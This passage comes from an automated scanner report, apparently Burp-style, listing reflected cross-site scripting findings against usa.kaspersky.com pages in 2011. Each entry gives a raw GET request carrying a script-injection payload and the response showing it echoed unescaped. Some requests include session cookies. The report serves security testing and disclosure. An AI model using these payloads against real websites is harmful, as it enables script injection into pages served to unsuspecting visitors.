Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145464"
Content-Type: text/html; charset=utf-8
Content-Length: 36607
Date: Sun, 04 Sep 2011 14:11:17 GMT
X-Varnish: 1163256819
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services1927f"><script>alert(1)</script>4da6a2e3d63/home-computer-security/index.html" />
...[SNIP]...

1.102. http://usa.kaspersky.com/products-services/home-computer-security/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e87a"-alert(1)-"63b94f304e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services4e87a"-alert(1)-"63b94f304e1/home-computer-security/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:50 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145510"
Content-Type: text/html; charset=utf-8
Content-Length: 39750
Date: Sun, 04 Sep 2011 14:11:58 GMT
X-Varnish: 1163258422
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services4e87a"-alert(1)-"63b94f304e1/home-computer-security/index.html";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.103. http://usa.kaspersky.com/products-services/home-computer-security/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 482c7"><script>alert(1)</script>ca326f1366e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security482c7"><script>alert(1)</script>ca326f1366e/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:12:26 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145546"
Content-Type: text/html; charset=utf-8
Content-Length: 36846
Date: Sun, 04 Sep 2011 14:12:41 GMT
X-Varnish: 1163259929
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security482c7"><script>alert(1)</script>ca326f1366e/index.html" />
...[SNIP]...

1.104. http://usa.kaspersky.com/products-services/home-computer-security/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42846"-alert(1)-"1737ec5e156 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security42846"-alert(1)-"1737ec5e156/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:12:49 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145569"
Content-Type: text/html; charset=utf-8
Content-Length: 40168
Date: Sun, 04 Sep 2011 14:12:53 GMT
X-Varnish: 1163260724
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security42846"-alert(1)-"1737ec5e156/index.html";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.105. http://usa.kaspersky.com/products-services/home-computer-security/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28525"><script>alert(1)</script>9ade6974e30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/index.html28525"><script>alert(1)</script>9ade6974e30 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:13:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145585"
Content-Type: text/html; charset=utf-8
Content-Length: 38111
Date: Sun, 04 Sep 2011 14:13:09 GMT
X-Varnish: 1163261437
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/index.html28525"><script>alert(1)</script>9ade6974e30" />
...[SNIP]...

1.106. http://usa.kaspersky.com/products-services/home-computer-security/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/index.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62dbd"-alert(1)-"91cf1275c68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security/index.html62dbd"-alert(1)-"91cf1275c68 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:13:19 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145599"
Content-Type: text/html; charset=utf-8
Content-Length: 39901
Date: Sun, 04 Sep 2011 14:13:23 GMT
X-Varnish: 1163262189
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
= s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security/index.html62dbd"-alert(1)-"91cf1275c68";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.107. http://usa.kaspersky.com/products-services/home-computer-security/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 784c6"><script>alert(1)</script>ea35560650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/index.html?784c6"><script>alert(1)</script>ea35560650=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:35 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145255"
Content-Type: text/html; charset=utf-8
Content-Length: 41860
Date: Sun, 04 Sep 2011 14:07:40 GMT
X-Varnish: 1163248752
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/index.html?784c6"><script>alert(1)</script>ea35560650=1" />
...[SNIP]...

1.108. http://usa.kaspersky.com/products-services/home-computer-security/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50061"-alert(1)-"b1568a13e65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security/index.html?50061"-alert(1)-"b1568a13e65=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:08:14 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145294"
Content-Type: text/html; charset=utf-8
Content-Length: 41544
Date: Sun, 04 Sep 2011 14:08:22 GMT
X-Varnish: 1163250385
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security/index.html?50061"-alert(1)-"b1568a13e65=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.109. http://usa.kaspersky.com/products-services/home-computer-security/internet-security [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/internet-security

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ed40"><script>alert(1)</script>c411af10f77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services3ed40"><script>alert(1)</script>c411af10f77/home-computer-security/internet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:05:34 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141534"
Content-Type: text/html; charset=utf-8
Content-Length: 40589
Date: Sun, 04 Sep 2011 13:05:46 GMT
X-Varnish: 1163120586
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services3ed40"><script>alert(1)</script>c411af10f77/home-computer-security/internet-security" />
...[SNIP]...

1.110. http://usa.kaspersky.com/products-services/home-computer-security/internet-security [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/internet-security

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc970"-alert(1)-"d7b46699d0c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-servicesfc970"-alert(1)-"d7b46699d0c/home-computer-security/internet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:06:06 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141566"
Content-Type: text/html; charset=utf-8
Content-Length: 40884
Date: Sun, 04 Sep 2011 13:06:17 GMT
X-Varnish: 1163121831
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-servicesfc970"-alert(1)-"d7b46699d0c/home-computer-security/internet-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.111. http://usa.kaspersky.com/products-services/home-computer-security/internet-security [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/internet-security

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7a80"><script>alert(1)</script>c1160999181 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-securityb7a80"><script>alert(1)</script>c1160999181/internet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:08:39 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141719"
Content-Type: text/html; charset=utf-8
Content-Length: 40946
Date: Sun, 04 Sep 2011 13:08:54 GMT
X-Varnish: 1163126343
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-securityb7a80"><script>alert(1)</script>c1160999181/internet-security" />
...[SNIP]...

1.112. http://usa.kaspersky.com/products-services/home-computer-security/internet-security [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/internet-security

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75ac9"-alert(1)-"44655643b9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security75ac9"-alert(1)-"44655643b9d/internet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:09:40 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141780"
Content-Type: text/html; charset=utf-8
Content-Length: 40617
Date: Sun, 04 Sep 2011 13:09:50 GMT
X-Varnish: 1163128122
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security75ac9"-alert(1)-"44655643b9d/internet-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.113. http://usa.kaspersky.com/products-services/home-computer-security/internet-security [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/internet-security

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60faf"-alert(1)-"aea51866174 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security/internet-security60faf"-alert(1)-"aea51866174 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:11:29 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141889"
Content-Type: text/html; charset=utf-8
Content-Length: 40681
Date: Sun, 04 Sep 2011 13:11:34 GMT
X-Varnish: 1163130845
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
p4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security/internet-security60faf"-alert(1)-"aea51866174";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.114. http://usa.kaspersky.com/products-services/home-computer-security/internet-security [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/internet-security

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75d19"><script>alert(1)</script>e6a94cf142d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/internet-security75d19"><script>alert(1)</script>e6a94cf142d HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:11:10 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141870"
Content-Type: text/html; charset=utf-8
Content-Length: 41010
Date: Sun, 04 Sep 2011 13:11:16 GMT
X-Varnish: 1163130444
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/internet-security75d19"><script>alert(1)</script>e6a94cf142d" />
...[SNIP]...

1.115. http://usa.kaspersky.com/products-services/home-computer-security/internet-security [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/internet-security

Issue detail

